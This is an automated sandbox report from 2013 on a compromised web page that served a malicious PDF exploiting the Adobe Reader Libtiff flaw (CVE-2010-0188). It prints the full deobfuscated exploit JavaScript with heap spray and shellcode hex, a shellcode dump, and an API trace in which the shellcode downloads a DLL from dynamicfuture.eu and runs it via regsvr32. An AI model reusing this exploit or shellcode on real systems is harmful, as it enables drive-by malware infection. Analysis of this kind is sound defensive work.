Analysis report for http://aod.org.hk/help/index2.php
Sample Overview¶
| URL | http://aod.org.hk/help/index2.php |
|---|---|
| Domain | aod.org.hk |
| Analysis Started | 2013-01-28 06:11:03 |
| Report Generated | 2013-01-28 06:11:36 |
| Jsand version | 2.3.5 |
See the report for domain aod.org.hk.
Detection results¶
| Detector | Result |
|---|---|
| Jsand 2.3.5 | malicious |
In particular, the following URL was found to contain malicious content:
- http://dynamicfuture.eu/987.pdf
Exploits¶
| Name | Description | Reference |
|---|---|---|
| Adobe Libtiff | Libtiff integer overflow in Adobe Reader and Acrobat | CVE-2010-0188 |
Deobfuscation results¶
Evals
- (repeated 1 time)
BruKDa = unescape(sherman.replace(/NunnaK/g, gicyw.charAt(2)));
- (repeated 1 time)
/*adherkmkm xy*/var j_IgC = [31, 31, 15, 23]; function _k_m(){ return app; } function _b_(xVgFqV){ var ___N = ''; ___N = unescape(xVgFqV); return ___N; } function get_ver(){ var ver = _k_m().viewerVersion.toString(); ver = ver.replace('.', ''); while (ver.length < 4){ ver += '0'; } ver = parseInt(ver, 10); return ver; } function make_block(xVgFqV, len){ while (xVgFqV.length * 2 < len){ xVgFqV += xVgFqV; } xVgFqV = xVgFqV.substring(0, len / 2); return xVgFqV; } function heap_spray3(scode){ scode = _b_(scode); var sclen = scode.length * 2; var fxcvxx = _b_('%u9090'); var spray = make_block(fxcvxx, 0x2000 - sclen); var block = scode + spray; block = make_block(block, 0x80000 - 0x40); for (var i = 0; i < 0x190; i ++ ){ j_IgC[i] = block.substr(0, block.length - 1) + fxcvxx; } return ; } function make_str(xVgFqV, len){ while (xVgFqV.length < len){ xVgFqV += xVgFqV; } xVgFqV = xVgFqV.substring(0, len); return xVgFqV; } function num2hex(num){ var xVgFqV = num.toString(16); var len = xVgFqV.length; var ret = (len % 2) ? '0' + xVgFqV : xVgFqV; return ret; } function str2uni(xVgFqV){ var ret = ''; for (var i = 0; i < xVgFqV.length; i += 2){ ret += '%u'; ret += num2hex(xVgFqV.charCodeAt(i + 1)); ret += num2hex(xVgFqV.charCodeAt(i)); } return ret; } function hex2str(hex){ var ret = ''; for (var i = 0; i < hex.length; i += 2){ var b = hex.substr(i, 2); var num = parseInt(b, 16); ret += String.fromCharCode(num); } return ret; } splaui(); function splaui(){ var ver = get_ver(); if (ver >= 0x1f40){ var tiff = 'SUkqADggAABB'; var nops = make_str('QUFB', 0x2ae8); var start = ' QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////'; var foot = ''; var sc_hex = ''; if (ver < 0x2009){ foot = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK'; var sc_hex = ' 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000 0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b 1bc64679361a2f70687474703a2f2f64796e616d69636675747572652e65752f36322e68746d6c0000'; } else { foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK'; sc_hex = ' 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b 1bc64679361a2f70687474703a2f2f64796e616d69636675747572652e65752f36322e68746d6c0000'; } if (foot.length){ var ret = [tiff, nops, start, foot].join(''); var sc_str = hex2str(sc_hex); var scode = str2uni(sc_str); heap_spray3(scode); alltroxd4s.rawValue = ret; } } }
Writes
No writes.Network Activity¶
Requests
| URL | Status | Content Type |
|---|---|---|
| http://aod.org.hk/help/index2.php | 200 | text/html |
| about:blank | 200 | text/html |
| http://113.208.12.120/akvt.html | 302 | text/html |
| http://dynamicfuture.eu/akvt.htm | 200 | text/html |
| http://dynamicfuture.eu/332.jar | 200 | application/zip |
| http://dynamicfuture.eu/887.jar | 404 | empty |
| http://dynamicfuture.eu/987.pdf | 200 | application/pdf |
Redirects
| From | To |
|---|---|
| http://113.208.12.120/akvt.html | http://dynamicfuture.eu/akvt.htm |
ActiveX controls¶
-
AcroPDF.PDF No attribute setting or method call detected -
Msxml2.XMLHTTP No attribute setting or method call detected
Shellcode¶
| Hexadecimal | ASCII |
|---|---|
4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30 20 82 4a 6e 2f 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41 41 41 41 41 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02 eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83 c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 64 79 6e 61 6d 69 63 66 75 74 75 72 65 2e 65 75 2f 36 32 2e 68 74 6d 6c 00 25 00 75 00 30 00 4e 00 61 00 4e 00 30 00 30 00 | L.`....J<.`..c.J ...J0..Jn/.JAAAA &............... .9.Jd.`.....AAAA AAAAf......u4._3 .d.@0.@..p.V.v.3 .f.^<.t3,....... .@0.F9.u..4$..uQ ..LQV.u<.t5x..V. v...3.IA....3... .8.t......@..;.u .^.^$..f..K.F..T $...........^Y.. S..h..}.3t.....h ...j.Y.......... ..XPj@h....P...P U...^......hon.. hurlmT........a. .....r.......\$. ..$regs.D$.vr32. D$..-s.Sh.....V. ..3.Q.D..wpbt.D. ..dll.D...Y...0. D..AQj.j.SWj..V. ..u.j.S.V.j....S .V........G.?.u. G.?.u.j.j..V.... ...N.......o..3. .[..Fy6./phttp:/ /dynamicfuture.e u/62.html.%.u.0. N.a.N.0.0. |
This shellcode was found on http://dynamicfuture.eu/987.pdf.
Shellcode Analysis
Shellcode API Trace
| Offset | DLL.API Name and arguments | Return value |
|---|---|---|
| 0x7c801ad9 | kernel32.VirtualProtect(lpAddress=0x4020f8, dwSize=255) | 1 |
| 0x7c801d7b | kernel32.LoadLibraryA(lpFileName=urlmon) | 0x1a400000 |
| 0x7c835dfa | kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=http://dynamicfuture.eu/62.html, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=%, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=u, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt2.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt2.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt2.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=0, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt3.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt3.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt3.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=N, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt4.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt4.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt4.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=a, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt5.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt5.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt5.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=N, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt6.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt6.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt6.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=0, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt7.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt7.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt7.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=0, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt8.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt8.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt8.dll, uCmdShow=0) | |
| 0x7c81cb3b | kernel32.TerminateThread(dwExitCode=0) |
Shellcode DLLs
| DLL Name |
|---|
| kernel32.dll |
| urlmon.dll |
Shellcode URLs
| Complete URL | Domain Name | IP Address |
|---|---|---|
| http://dynamicfuture.eu/62.html | dynamicfuture.eu |
Malware¶
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://dynamicfuture.eu/62.html | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | b83a6d31726c6f790772ad885f5ba69c |
Comments